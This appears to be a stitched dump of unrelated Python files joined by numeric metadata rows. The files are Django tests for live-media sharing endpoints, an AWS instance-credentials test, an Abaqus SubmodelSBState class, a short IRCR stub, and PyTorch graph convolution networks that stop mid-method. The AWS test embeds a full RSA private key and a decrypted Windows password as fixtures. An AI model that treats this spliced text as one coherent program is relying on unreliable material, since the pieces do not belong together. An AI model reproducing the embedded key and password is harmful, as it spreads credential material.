) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": None},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "Invalid page number."})
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 1)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_navigate_missing_page(self):
"""An instructor can not navigate to an undefined page in a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/navigate-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "Invalid page number."})
self.assertEqual(video.active_shared_live_media, shared_live_media)
self.assertEqual(video.active_shared_live_media_page, 1)
@override_settings(LIVE_CHAT_ENABLED=True)
@override_settings(XMPP_BOSH_URL="https://xmpp-server.com/http-bind")
@override_settings(XMPP_CONFERENCE_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_DOMAIN="conference.xmpp-server.com")
@override_settings(XMPP_JWT_SHARED_SECRET="xmpp_shared_secret")
def test_api_video_shared_live_media_end_instructor(self):
"""An instructor can end a shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=6)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
active_shared_live_media=shared_live_media,
active_shared_live_media_page=1,
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(shared_live_media.video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups, mock.patch(
"marsha.core.serializers.xmpp_utils.generate_jwt"
) as mock_jwt_encode:
mock_jwt_encode.return_value = "xmpp_jwt"
response = self.client.patch(
f"/api/videos/{shared_live_media.video.id}/end-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_called_once_with(video)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content)
self.assertEqual(
{
"active_shared_live_media": None,
"active_shared_live_media_page": None,
"allow_recording": True,
"description": shared_live_media.video.description,
"estimated_duration": None,
"has_chat": True,
"has_live_media": True,
"id": str(shared_live_media.video.id),
"title": shared_live_media.video.title,
"active_stamp": None,
"is_public": False,
"is_ready_to_show": True,
"is_recording": False,
"is_scheduled": False,
"join_mode": "approval",
"show_download": True,
"starting_at": None,
"upload_state": "pending",
"thumbnail": None,
"timed_text_tracks": [],
"urls": {
"manifests": {
"hls": "https://channel_endpoint1/live.m3u8",
},
"mp4": {},
"thumbnails": {},
},
"should_use_subtitle_as_transcript": False,
"has_transcript": False,
"participants_asking_to_join": [],
"participants_in_discussion": [],
"playlist": {
"id": str(shared_live_media.video.playlist.id),
"title": "foo bar",
"lti_id": "course-v1:ufr+mathematics+00001",
},
"recording_time": 0,
"shared_live_medias": [
{
"active_stamp": None,
"filename": None,
"id": str(shared_live_media.id),
"is_ready_to_show": False,
"nb_pages": shared_live_media.nb_pages,
"show_download": True,
"title": None,
"upload_state": "pending",
"urls": None,
"video": str(video.id),
}
],
"live_state": "running",
"live_info": {
"jitsi": {
"config_overwrite": {},
"domain": "meet.jit.si",
"external_api_url": "https://meet.jit.si/external_api.js",
"interface_config_overwrite": {},
"room_name": str(video.pk),
},
"medialive": {
"input": {
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
}
},
},
"live_type": JITSI,
"xmpp": {
"bosh_url": "https://xmpp-server.com/http-bind?token=xmpp_jwt",
"converse_persistent_store": "localStorage",
"websocket_url": None,
"conference_url": f"{video.id}@conference.xmpp-server.com",
"jid": "conference.xmpp-server.com",
},
},
content,
)
self.assertEqual(video.active_shared_live_media, None)
self.assertEqual(video.active_shared_live_media_page, None)
def test_api_video_shared_live_media_end_no_active(self):
"""An instructor can not end if no active shared live media."""
shared_live_media = SharedLiveMediaFactory(nb_pages=2)
video = VideoFactory(
playlist__title="foo bar",
playlist__lti_id="course-v1:ufr+mathematics+00001",
upload_state=PENDING,
live_state=RUNNING,
live_type=JITSI,
live_info={
"medialive": {
"input": {
"id": "medialive_input_1",
"endpoints": [
"https://live_endpoint1",
"https://live_endpoint2",
],
},
"channel": {"id": "medialive_channel_1"},
},
"mediapackage": {
"id": "mediapackage_channel_1",
"endpoints": {
"hls": {
"id": "endpoint1",
"url": "https://channel_endpoint1/live.m3u8",
},
},
},
},
)
video.shared_live_medias.set([shared_live_media])
jwt_token = AccessToken()
jwt_token.payload["resource_id"] = str(video.id)
jwt_token.payload["roles"] = [random.choice(["instructor", "administrator"])]
jwt_token.payload["permissions"] = {"can_update": True}
jwt_token.payload["user"] = {"id": "56255f3807599c377bf0e5bf072359fd"}
with mock.patch.object(
channel_layers_utils, "dispatch_video_to_groups"
) as mock_dispatch_video_to_groups:
response = self.client.patch(
f"/api/videos/{video.id}/end-sharing/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
data={"target_page": 2},
content_type="application/json",
)
video.refresh_from_db()
mock_dispatch_video_to_groups.assert_not_called()
self.assertEqual(response.status_code, 400)
self.assertEqual(response.json(), {"detail": "No shared live media."})
self.assertEqual(video.active_shared_live_media, None)
self.assertEqual(video.active_shared_live_media_page, None)
| 43.60781 | 93 | 0.509091 | 4,608 | 51,370 | 5.361979 | 0.060547 | 0.078922 | 0.112312 | 0.038044 | 0.965558 | 0.961268 | 0.953618 | 0.9435 | 0.936458 | 0.926056 | 0 | 0.020226 | 0.384037 | 51,370 | 1,177 | 94 | 43.64486 | 0.760635 | 0.031925 | 0 | 0.792183 | 0 | 0 | 0.230901 | 0.083029 | 0 | 0 | 0 | 0 | 0.064824 | 1 | 0.020019 | false | 0.00286 | 0.00858 | 0 | 0.030505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24f5d20a89c5bc2133ac31deb764a8d8e39662fb | 3,431 | py | Python | package/tests/test_domain_services/test_ami_creds_service.py | DYeag/AWS-Shell | b5318e72373b1a948ac6aced1c0bb4566d5ae46f | [
"0BSD"
] | 3 | 2016-08-22T07:14:56.000Z | 2018-03-16T07:31:44.000Z | package/tests/test_domain_services/test_ami_creds_service.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | 470 | 2016-03-24T13:38:08.000Z | 2022-02-05T01:14:05.000Z | package/tests/test_domain_services/test_ami_creds_service.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | 9 | 2016-06-20T11:41:54.000Z | 2020-11-21T00:42:45.000Z | from unittest import TestCase
from mock import Mock
from cloudshell.cp.aws.domain.services.ec2.instance_credentials import InstanceCredentialsService
from cloudshell.cp.aws.domain.services.waiters.password import PasswordWaiter
class TestAmiCredentialsService(TestCase):
def setUp(self):
self.password_waiter = Mock(spec=PasswordWaiter)
self.credentials_service = InstanceCredentialsService(self.password_waiter)
self.pem = ['-----BEGIN RSA PRIVATE KEY-----\n',
'MIIEpQIBAAKCAQEAzdX6TR8fnJ0vXilViU5OHzvHfQVXdCufZcr1yDiT3hJ04IgX/INaOfI5+xIC\n', '+qrl9IMJ19Tol/t+asB3eiIo2DK6K5DFYhBDSGKfC2AE+c53B/eeTq/+CGjTma6bNaFSNkiJdOhM\n', 'fNdmAOYYx4B2PqZXgNPGbN3WEGYldU6DiX1IU/hmihjdoW8oL/84DUrkJCl+lZhqP9uVHMp/8yzu\n', 'GovUOF2FNuXMo0tSFeUBeUKZig28u/lhuCEqq2TkHbpvlojjyVqqRoxqw/2ZnUua4PnKSx1U8ddg\n', 'OGg4QXxX1D2DQ8XpRL7pEYdK3A51AaZr7IcpSwtDm5XS/FZ0slCUFwIDAQABAoIBAB3hlGahwAsS\n', 'XpAC3CIEth6epQUnQ1zgAFHctvWMERtJ/qGh4CmOQAjtezFRmhEdwihO5ZzpkaKOpfmFW1LlppxM\n', 'MO6mI6FqzvmxJ3mVROOm72y+q8KslepOnXlP+cQ9WRv8R8gq+P+enXY/8RT1NzU9HLLdC48+XRcg\n', 'XQu8jCfnP1yxKFBxvd8iJtb59KWtaljHoYZSy1P+QPXWtaMb9p+Vd91g9UfPr0b5Ih+Q2AZQP1/F\n', 'I+TypGCEp16K2xIiXaf/CxEWGfRTnwhyyxnEB0apcDv4KJtiZlcl81y3Haeuo6+A8PksnVXDACY3\n', 'GRLksEGIfokb9rqFnk4ay37N1zECgYEA8ggt65yj6iAp1WzspinzxKjQovcUBt1nMo63I1RB41fb\n', 'g0kVHigZDpoqziSZoHmt7mSjS1OBq6xNnmtCOFF4uYkA5d7WyFSfeKSXqT5WFfPOOoGVnw4mIoeD\n', 'OVV401pObis+sVhIYb5nOepDjnV7XIiIlV8DRu8RuP+PKp8C9x0CgYEA2bcH9tJHTqUOs4us0KWO\n', '+5To96iEqqs5bnIZueNGRDGZkSrjX46IGS5o+awCChvvJAPf/CRSpoQhQqcUCy+deNrfQHt2Zpaq\n', 'gD9Qv3AKv5ESnvqnLVFy4FVYvTIDxs8rbTAVHe1/IBi5+xAOnpi2riPhTOVzyJ8NhhwtVYyDbcMC\n', 'gYEA2HcESvOfjmgRwjZXOQ3QXZT2dKoymSkvgQIvPUPAYgpT44lbf8sxDeRIYHJPjD0HmG0dtuMK\n', '2HWUPhmD8ka7iITF7tFsm2ND9WyPz+hWqe+SBLWdEdJfvQYiEQcmtzDPcKzwt0BUDEd0n1Gr9h+Q\n', 'o2PhdGaz0Z9D5Id8jgwFZOkCgYEA0hPg5XPGRsbSRsGyQapfK7dmjQLY8O5DfqUu2cXKWacarY8a\n', '02vvO40i0jf9x89ok/IBQYWzEuZQScZ6esi5RJK99bSsbRVY9GMkAXWViX/s3eazRfFfzcPM2tLV\n', '/hKNrtBEsBopHsl9PBskYDivnZ0Vm2OUs7N2E0BBJlltwI0CgYEA5/eb88pqBcCrfrYi4U8WN3id\n', 'o0t3dj4ca7BPGwvGGMuEB4JPZmsS3AWMGXKSBpEpqMSxHMeTZtxo/ioi4mEGM5SMi0KLSnrWuuYX\n', '+OQfjjQfag6Y7SdiQAyhvpndODqEiqfFDqCnR11T447V/JwyEdxFUwYoLiot5tcZOOOxl2o=\n', '-----END RSA PRIVATE KEY-----']
self.encrypted = 'NGtKthoEIcRdof+dlQJcJ87HQpPfjwFHKe6e5fiSCt2l523FWgIuqIv+Pda/KF+q/jzhacospZUjQqSBX7aKHA1Qm7tWsNywYP0nAypJOTU0UtJZKVZ9ymXHsPXq+kvaEtq0xvl08MCKUiROlV7jlS1sySvspcum5E49s8lm2nAS9W4dljdytFP/CtEDEfOec87DQG9aCPsDOGbH8efWpEDEQ5pzNhybGyrlI3x8PxFM5JNtSZFTQxCs0vfYjsM2I3VKcrIuVGaQOu9qZZArzANUDCbE3V+BD664y0W5h4RjyowhEAtcTc8NxEFAYOKMJAb253TjLr3Vk/7MmwgFkA=='
self.decrypted = '542(LhS@Ymq'
def test_get_windows_credentials_wait(self):
instance = Mock()
instance.password_data = Mock(return_value={'PasswordData': ''})
self.password_waiter.wait = Mock(return_value=self.encrypted)
res = self.credentials_service.get_windows_credentials(instance, ''.join(self.pem))
self.assertEquals(self.decrypted, self.credentials_service.decrypt_password(self.pem, self.encrypted), res.password)
self.assertEquals('Administrator', res.user_name, InstanceCredentialsService.DEFAULT_USER_NAME)
def test_get_default_linux_credentials(self):
cred = self.credentials_service.get_default_linux_credentials()
self.assertEquals(cred.user_name, 'root')
self.assertFalse(cred.password)
| 107.21875 | 1,770 | 0.843486 | 247 | 3,431 | 11.59919 | 0.526316 | 0.020942 | 0.030716 | 0.013264 | 0.043979 | 0.023037 | 0 | 0 | 0 | 0 | 0 | 0.088854 | 0.071699 | 3,431 | 31 | 1,771 | 110.677419 | 0.810675 | 0 | 0 | 0 | 0 | 0 | 0.606237 | 0.576508 | 0 | 1 | 0 | 0 | 0.173913 | 1 | 0.130435 | false | 0.304348 | 0.173913 | 0 | 0.347826 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
700fef6d48c6d979cd305e567f0da7f54f6ec0af | 4,197 | py | Python | src/abaqus/Load/SubmodelSBState.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/Load/SubmodelSBState.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/Load/SubmodelSBState.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
from .LoadState import LoadState
class SubmodelSBState(LoadState):
"""The SubmodelSBState object stores the propagating data for a Submodel load in a step.
One instance of this object is created internally by the SubmodelSB object for each
step. The instance is also deleted internally by the SubmodelSB object.
The SubmodelSBState object has no constructor or methods.
The SubmodelSBState object is derived from the LoadState object.
Attributes
----------
globalStepState: SymbolicConstant
A SymbolicConstant specifying the propagation state of the **globalStep** member. Possible
values are SET and UNCHANGED.
globalIncrement: int
An Int specifying the increment number in the global model step at which the solution
will be used to specify the values of the driven variables. This argument is applicable
only for linear perturbation steps.
globalIncrementState: SymbolicConstant
A SymbolicConstant specifying the propagation state of the **globalIncrement** member.
Possible values are SET and UNCHANGED.
globalStep: str
A String specifying the step in the global model from which Abaqus reads the values of
the variables that will drive the submodel analysis. The String indicates the position
of the step in the sequence of analysis steps. For example, **globalStep**='1' indicates
the first step.
amplitudeState: SymbolicConstant
A SymbolicConstant specifying the propagation state of the **amplitude** member. Possible
values are UNSET, SET, UNCHANGED, and FREED.
status: SymbolicConstant
A SymbolicConstant specifying the propagation state of the :py:class:`~abaqus.Load.LoadState.LoadState` object. Possible
values are:
- NOT_YET_ACTIVE
- CREATED
- PROPAGATED
- MODIFIED
- DEACTIVATED
- NO_LONGER_ACTIVE
- TYPE_NOT_APPLICABLE
- INSTANCE_NOT_APPLICABLE
- BUILT_INTO_BASE_STATE
amplitude: str
A String specifying the name of the amplitude reference. The String is empty if the load
has no amplitude reference.
Notes
-----
This object can be accessed by:
.. code-block:: python
import load
mdb.models[name].steps[name].loadStates[name]
The corresponding analysis keywords are:
- SUBMODEL
- DSLOAD
"""
# A SymbolicConstant specifying the propagation state of the *globalStep* member. Possible
# values are SET and UNCHANGED.
globalStepState: SymbolicConstant = None
# An Int specifying the increment number in the global model step at which the solution
# will be used to specify the values of the driven variables. This argument is applicable
# only for linear perturbation steps.
globalIncrement: int = None
# A SymbolicConstant specifying the propagation state of the *globalIncrement* member.
# Possible values are SET and UNCHANGED.
globalIncrementState: SymbolicConstant = None
# A String specifying the step in the global model from which Abaqus reads the values of
# the variables that will drive the submodel analysis. The String indicates the position
# of the step in the sequence of analysis steps. For example, *globalStep*='1' indicates
# the first step.
globalStep: str = ''
# A SymbolicConstant specifying the propagation state of the *amplitude* member. Possible
# values are UNSET, SET, UNCHANGED, and FREED.
amplitudeState: SymbolicConstant = None
# A SymbolicConstant specifying the propagation state of the LoadState object. Possible
# values are:
# - NOT_YET_ACTIVE
# - CREATED
# - PROPAGATED
# - MODIFIED
# - DEACTIVATED
# - NO_LONGER_ACTIVE
# - TYPE_NOT_APPLICABLE
# - INSTANCE_NOT_APPLICABLE
# - BUILT_INTO_BASE_STATE
status: SymbolicConstant = None
# A String specifying the name of the amplitude reference. The String is empty if the load
# has no amplitude reference.
amplitude: str = ''
| 40.747573 | 128 | 0.699071 | 499 | 4,197 | 5.835671 | 0.240481 | 0.027473 | 0.074176 | 0.082418 | 0.750687 | 0.727335 | 0.713599 | 0.713599 | 0.713599 | 0.653846 | 0 | 0.000639 | 0.254467 | 4,197 | 102 | 129 | 41.147059 | 0.93001 | 0.824875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
708c7c3ff17e0ca3421c55c2ec4afb5bebf42c80 | 204 | py | Python | algorithm/ircr.py | Stilwell-Git/Randomized-Return-Decomposition | bc804736cbac0ab7ef2eb241d5b17f4a5e2e80a2 | [
"MIT"
] | 1 | 2022-03-21T21:38:15.000Z | 2022-03-21T21:38:15.000Z | algorithm/ircr.py | Stilwell-Git/Randomized-Return-Decomposition | bc804736cbac0ab7ef2eb241d5b17f4a5e2e80a2 | [
"MIT"
] | null | null | null | algorithm/ircr.py | Stilwell-Git/Randomized-Return-Decomposition | bc804736cbac0ab7ef2eb241d5b17f4a5e2e80a2 | [
"MIT"
] | null | null | null | from algorithm import basis_algorithm_collection
def IRCR(args):
# The algorithmic components of IRCR is implemented in the replay buffer.
return basis_algorithm_collection[args.basis_alg](args)
| 34 | 77 | 0.808824 | 28 | 204 | 5.714286 | 0.678571 | 0.175 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142157 | 204 | 5 | 78 | 40.8 | 0.914286 | 0.348039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
5656f1b44b514c2945132ce69bd79d13fea68b02 | 20,587 | py | Python | network/gcn_network.py | 3dperceptionlab/tactile-gcn | e05cd574f097a372a612e8fcbeb7645c316dd97a | [
"MIT"
] | 10 | 2019-05-02T08:42:09.000Z | 2021-03-15T05:44:29.000Z | network/gcn_network.py | 3dperceptionlab/tactile-gcn | e05cd574f097a372a612e8fcbeb7645c316dd97a | [
"MIT"
] | null | null | null | network/gcn_network.py | 3dperceptionlab/tactile-gcn | e05cd574f097a372a612e8fcbeb7645c316dd97a | [
"MIT"
] | 5 | 2019-03-22T06:21:33.000Z | 2020-07-10T09:13:35.000Z | import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.data import Data
from torch_geometric.data import DataLoader
from torch_geometric.nn import GCNConv, ChebConv # noqa
from torch_geometric.utils import normalized_cut
from torch_geometric.nn import (SplineConv, graclus, max_pool, max_pool_x,
global_mean_pool)
log = logging.getLogger(__name__)
def normalized_cut_2d(edge_index, pos):
row, col = edge_index
edge_attr = torch.norm(pos[row] - pos[col], p=2, dim=1)
return normalized_cut(edge_index, edge_attr, num_nodes=pos.size(0))
class GCN_test(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.fc1 = torch.nn.Linear(768, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
log.debug(data.x.view(-1).size())
data.x = self.fc1(data.x.view(-1))
#data.x = F.dropout(data.x, training=self.training)
data.x = self.fc2(data.x)
#data.x = F.dropout(data.x, training=self.training)
log.debug(data.x.size())
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
log.debug(data.x.size())
return data.x
class GCN_32(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 32)
self.fc1 = torch.nn.Linear(32, numClasses)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
weight = normalized_cut_2d(data.edge_index, data.pos)
cluster = graclus(data.edge_index, weight, data.x.size(0))
data.x, batch = max_pool_x(cluster, data.x, data.batch)
data.x = global_mean_pool(data.x, batch)
data.x = self.fc1(data.x)
data.x = F.log_softmax(data.x, dim=1)
return data.x
class GCN_32_64(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 32)
self.conv2 = GCNConv(32, 64)
self.fc1 = torch.nn.Linear(64, numClasses)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
data.x = self.conv2(data.x, data.edge_index)
weight = normalized_cut_2d(data.edge_index, data.pos)
cluster = graclus(data.edge_index, weight, data.x.size(0))
data.x, batch = max_pool_x(cluster, data.x, data.batch)
data.x = global_mean_pool(data.x, batch)
data.x = self.fc1(data.x)
data.x = F.log_softmax(data.x, dim=1)
return data.x
class GCN_32_64_128(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 32)
self.conv2 = GCNConv(32, 64)
self.conv3 = GCNConv(64, 128)
self.fc1 = torch.nn.Linear(128, numClasses)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.dropout(data.x, training=self.training)
data.x = self.conv2(data.x, data.edge_index)
data.x = self.conv3(data.x, data.edge_index)
weight = normalized_cut_2d(data.edge_index, data.pos)
cluster = graclus(data.edge_index, weight, data.x.size(0))
data.x, batch = max_pool_x(cluster, data.x, data.batch)
data.x = global_mean_pool(data.x, batch)
data.x = self.fc1(data.x)
data.x = F.log_softmax(data.x, dim=1)
return data.x
### Networks for depth tests
class GCN_8(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.fc1 = torch.nn.Linear(192, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
return data.x
class GCN_8_8(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.fc1 = torch.nn.Linear(192, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
return data.x
class GCN_8_8_8(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 8)
self.fc1 = torch.nn.Linear(192, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
return data.x
class GCN_8_8_8_8(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 8)
self.conv4 = GCNConv(8, 8)
self.fc1 = torch.nn.Linear(192, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
return data.x
class GCN_8_8_8_8_8(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 8)
self.conv4 = GCNConv(8, 8)
self.conv5 = GCNConv(8, 8)
self.fc1 = torch.nn.Linear(192, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = F.relu(self.conv5(data.x, data.edge_index))
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
return data.x
class GCN_8_8_16(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.fc1 = torch.nn.Linear(384, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
return data.x
class GCN_8_8_16_16(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.fc1 = torch.nn.Linear(384, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
data.x = F.relu(self.conv2(data.x, data.edge_index))
data.x = F.relu(self.conv3(data.x, data.edge_index))
data.x = F.relu(self.conv4(data.x, data.edge_index))
data.x = self.fc1(data.x.view(-1))
data.x = self.fc2(data.x)
data.x = F.log_softmax(data.x.view(1, 2), dim=1)
return data.x
class GCN_8_8_16_16_32(torch.nn.Module):
def __init__(self, numFeatures, numClasses):
super().__init__()
self.conv1 = GCNConv(numFeatures, 8)
self.conv2 = GCNConv(8, 8)
self.conv3 = GCNConv(8, 16)
self.conv4 = GCNConv(16, 16)
self.conv5 = GCNConv(16, 32)
self.fc1 = torch.nn.Linear(768, 128)
self.fc2 = torch.nn.Linear(128, numClasses * 1)
def forward(self, data):
data.x = F.relu(self.conv1(data.x, data.edge_index))
